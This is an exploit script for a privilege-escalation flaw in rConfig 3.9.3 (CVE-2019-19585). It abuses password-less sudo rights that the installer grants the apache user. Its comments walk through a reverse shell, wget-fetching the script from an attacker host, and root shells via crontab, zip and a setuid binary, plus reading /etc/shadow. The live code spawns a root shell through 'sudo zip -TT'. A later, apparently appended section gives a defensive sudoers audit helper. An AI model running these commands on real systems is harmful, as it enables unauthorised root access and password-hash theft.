# Exploit Title: rConfig <= v3.9.3 - Privilege Escalation
# Date: 07/11/2019
# CVE-2019-19585
# Exploit Author: vikingfr
# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh
# Version: tested v3.9.3
# Tested on: CentOS 7.7
#
# Notes : If you want to reproduce this in your lab environment, follow these links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
#
# Reading the "rConfig 3.x Installation Instructions" (http://help.rconfig.com/gettingstarted/installation), we can see that two install scripts are used :
# $ curl -O http://files.rconfig.com/downloads/scripts/install_rConfig.sh -A "Mozilla"
# $ grep curl install_rConfig.sh
# curl -O http://files.rconfig.com/downloads/scripts/centos7_install.sh -A "Mozilla" >> $LOGFILE 2>&1
# curl -O http://files.rconfig.com/downloads/scripts/centos6_install.sh -A "Mozilla" >> $LOGFILE 2>&1
#
# Looking at the install scripts, we see that the apache user is added to sudoers with NOPASSWD for several binaries.
# $ sed -n 131,148p centos7_install.sh
# #SUDOERs Update
# SUDOINSTALLMSG="Updating Sudoers File..."
# echo $SUDOINSTALLMSG;
# echo -ne '##### (33%\r)'
# sleep 1
# echo -ne '############# (66%)\r'
# sleep 1
# echo -ne '##########################(100%)\n'
# echo "<<<< Start - $SUDOINSTALLMSG >>>>" >> $LOGFILE 2>&1
# # update sudoers for rconfig specific tasks
# echo '### rConfig specific Apahce configuration' >> /etc/sudoers
# echo 'apache ALL = (ALL) NOPASSWD: /usr/bin/crontab, /usr/bin/zip, /bin/chmod, /bin/chown, /usr/bin/whoami, /usr/bin/wc, /usr/bin/tail, /bin/rm' >> /etc/sudoers
# echo 'Defaults:apache !requiretty' >> /etc/sudoers
# cat /etc/sudoers >> $LOGFILE 2>&1
# echo -e "${green}Status: Sudoers Updated${reset}\n";
# echo "<<<< End - $SUDOINSTALLMSG >>>>" >> $LOGFILE 2>&1
#
# So if an attacker has obtained web RCE or a shell as the Apache user, privilege escalation can be done with multiple techniques.
#
# Example
# $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081
# rconfig - CVE-2019-19509 - Web authenticated RCE
# [+] Logged in successfully, triggering the payload...
# [+] Check your listener !
#
# $ nc -nvlp 8081
# listening on [any] 8081 ...
# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34470
# bash: no job control in this shell
# bash-4.2$
#
# bash-4.2$ wget http://192.168.43.245:8000/rconfig_lpe.sh
# wget http://192.168.43.245:8000/rconfig_lpe.sh
# bash-4.2$ chmod 700 rconfig_lpe.sh
# bash-4.2$ ./rconfig_lpe.sh
#
# ./rconfig_lpe.sh
# rConfig v3.9.3 - Privilege Escalation
# id
# uid=0(root) gid=0(root) groups=0(root)
###########################
# LPE using crontab (ex : using vim)
###########################
# bash-4.2$ sudo crontab -e
# sudo crontab -e
# ...
# :set shell=/bin/sh
# :shell
# id
# uid=0(root) gid=0(root) groups=0(root)
###########################
# LPE using ZIP
###########################
# bash-4.2$ touch /tmp/LPE.txt
# bash-4.2$ sudo zip -q /tmp/LPE.zip /tmp/LPE.txt -T -TT '/bin/sh #'
# id
# uid=0(root) gid=0(root) groups=0(root)
echo "rConfig v3.9.3 - Privilege Escalation"
touch /tmp/LPE.txt
sudo zip -q /tmp/LPE.zip /tmp/LPE.txt -T -TT '/bin/sh #'
###########################
# LPE using chmod / chown
###########################
# bash-4.2$ cd /tmp
# bash-4.2$ echo 'int main() { setresuid(0,0,0); system("/bin/sh"); }' > privshell.c
# bash-4.2$ gcc -o privshell privshell.c
# bash-4.2$ rm privshell.c
# bash-4.2$ sudo chown root:root /tmp/privshell
# bash-4.2$ sudo chmod u+s /tmp/privshell
# bash-4.2$ ./privshell
# id
# uid=0(root) gid=48(apache) groups=48(apache)
###########################
# FILE READ using TAIL
###########################
# bash-4.2$ sudo tail -22 /etc/shadow
# sudo tail -22 /etc/shadow
# root:$6$Jhxxxxxxxxxxxxxxxxxxx8/:18208:0:99999:7:::
# bin:*:17834:0:99999:7:::
# daemon:*:17834:0:99999:7:::
# ...
# EOF
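The sudoers line appended by centos7_install.sh is the root cause of every technique above. The following audit helper is an added example (not part of the exploit or of rConfig) for defenders checking a host: it reads sudoers text, keeps only password-less rules for the web-server user, and reports which of the granted binaries are the ones this script abuses. The sample sudoers content is constructed from the installer lines quoted above; the function and variable names are my own.

```shell
#!/bin/sh
# Added audit helper, not part of the rConfig exploit above. It scans sudoers
# text for password-less rules granted to the web-server user and reports the
# binaries that this script turns into a root shell or root file read.
# Assumption: rules use the one-line form that centos7_install.sh appends.

# Constructed sample mirroring the lines the installer appends to /etc/sudoers.
SAMPLE_SUDOERS='### rConfig specific Apahce configuration
apache ALL = (ALL) NOPASSWD: /usr/bin/crontab, /usr/bin/zip, /bin/chmod, /bin/chown, /usr/bin/whoami, /usr/bin/wc, /usr/bin/tail, /bin/rm
Defaults:apache !requiretty'

# Binaries from that rule which the techniques above abuse (crontab and zip
# hand out a shell, chmod+chown plant a setuid binary, tail reads any file).
# whoami, wc and rm are not flagged here and deserve a separate review.
RISKY_BINS='crontab zip chmod chown tail'

# audit_sudoers USER  (sudoers text on stdin)
# Prints "USER BINARY" for every risky command in a NOPASSWD rule for USER.
audit_sudoers() {
    user="$1"
    grep -v '^[[:space:]]*#' |
    grep -E "^[[:space:]]*${user}[[:space:]].*NOPASSWD:" |
    while IFS= read -r rule; do
        # Everything after "NOPASSWD:" is the comma-separated command list.
        cmds=${rule#*NOPASSWD:}
        printf '%s\n' "$cmds" | tr ',' '\n' |
        while IFS= read -r cmd; do
            # First word is the command path; compare its basename.
            set -- $cmd
            bin=${1##*/}
            for risky in $RISKY_BINS; do
                if [ "$bin" = "$risky" ]; then
                    printf '%s %s\n' "$user" "$bin"
                fi
            done
        done
    done
}

# audit_file USER [SUDOERS_FILE]: same check against a file (default /etc/sudoers).
audit_file() {
    audit_sudoers "$1" < "${2:-/etc/sudoers}"
}

# Demo on the constructed sample; prints one line per risky binary.
printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudoers apache
```

On a real host, run `audit_file apache` as root (sudoers is not world-readable); an empty result means no password-less rule for that user grants one of the listed binaries.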